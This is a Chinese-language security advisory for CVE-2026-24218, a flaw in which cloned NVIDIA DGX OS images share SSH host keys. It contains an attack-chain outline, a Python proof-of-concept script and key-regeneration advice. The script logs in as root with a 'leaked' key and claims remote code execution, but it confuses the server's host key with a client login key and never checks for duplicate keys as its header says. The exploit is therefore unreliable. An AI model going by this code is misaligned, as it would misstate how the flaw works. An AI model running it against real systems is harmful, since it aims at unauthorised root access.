CVE-2026-24218 CVSS 8.1 高危

CVE-2026-24218 NVIDIA DGX OS SSH主机密钥重复漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24218

漏洞类型

配置错误、中间人攻击、远程代码执行

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NVIDIA DGX OS

漏洞概述

NVIDIA DGX OS在工厂配置过程中存在漏洞，由于克隆基础镜像导致多个系统部署了相同的SSH主机密钥。这种共享加密标识符的行为使攻击者能够进行主机冒充或中间人攻击。成功利用该漏洞可能导致代码执行、数据篡改、权限提升及信息泄露等严重后果。

技术细节

该漏洞的根本原因在于NVIDIA DGX OS的工厂配置流程缺乏密钥唯一性管理机制。在系统部署时，通过克隆基础镜像的方式安装操作系统，导致所有被克隆的系统都继承了完全相同的SSH主机密钥（包括公钥和私钥）。SSH协议依赖于主机密钥来验证服务器的身份，如果多台服务器共享同一密钥，破坏其中一台的信任关系将导致所有服务器面临风险。攻击者可以通过物理接触或利用其他漏洞获取单台设备的私钥，随后利用该密钥对网络中其他配置相同的DGX系统实施中间人攻击。在SSH连接建立过程中，攻击者可拦截并解密通信流量，甚至利用SSH的远程执行能力注入恶意命令，从而实现远程代码执行、数据窃取、权限提升及拒绝服务攻击，对基础设施安全构成严重威胁。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别运行NVIDIA DGX OS的目标系统。

STEP 2

2. 密钥获取

攻击者通过物理接触一台设备、逆向工程镜像或利用其他漏洞获取通用的SSH私钥。

STEP 3

3. 身份冒充

利用获取的私钥，攻击者冒充合法主机或建立中间人连接，绕过SSH认证机制。

STEP 4

4. 执行攻击

通过SSH会话执行恶意命令，实现远程代码执行、数据窃取或破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# Proof of Concept: Check for duplicate SSH host keys or connect using a leaked key.
import paramiko
import socket

# Assume we extracted the private key from a compromised image
PRIVATE_KEY_PATH = "id_rsa_leaked"
TARGET_HOST = "target-dgx-system-ip"

try:
    # Initialize SSH client
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Accepts the host key automatically
    
    # Attempt to connect using the leaked private key (assuming user access is obtained or key auth is forced)
    # Note: In a real scenario, this demonstrates the risk of shared keys allowing impersonation.
    private_key = paramiko.RSAKey.from_private_key_file(PRIVATE_KEY_PATH)
    
    print(f"[*] Attempting to connect to {TARGET_HOST} using leaked key...")
    ssh.connect(TARGET_HOST, username='root', pkey=private_key)
    
    # Execute command to show control
    stdin, stdout, stderr = ssh.exec_command('uname -a')
    print(stdout.read().decode())
    
    print("[+] Exploit successful: Remote code execution achieved via shared key.")
    ssh.close()

except Exception as e:
    print(f"[-] Connection failed: {e}")

影响范围

NVIDIA DGX OS (工厂配置镜像克隆版本)

防御指南

临时缓解措施

建议立即检查所有DGX系统的SSH主机密钥是否重复。如发现重复，需手动删除现有的主机密钥（通常位于/etc/ssh/ssh_host_*），并使用'ssh-keygen'命令为每台设备重新生成唯一的密钥对。同时，限制SSH访问的网络范围，并启用多因素认证以减少风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表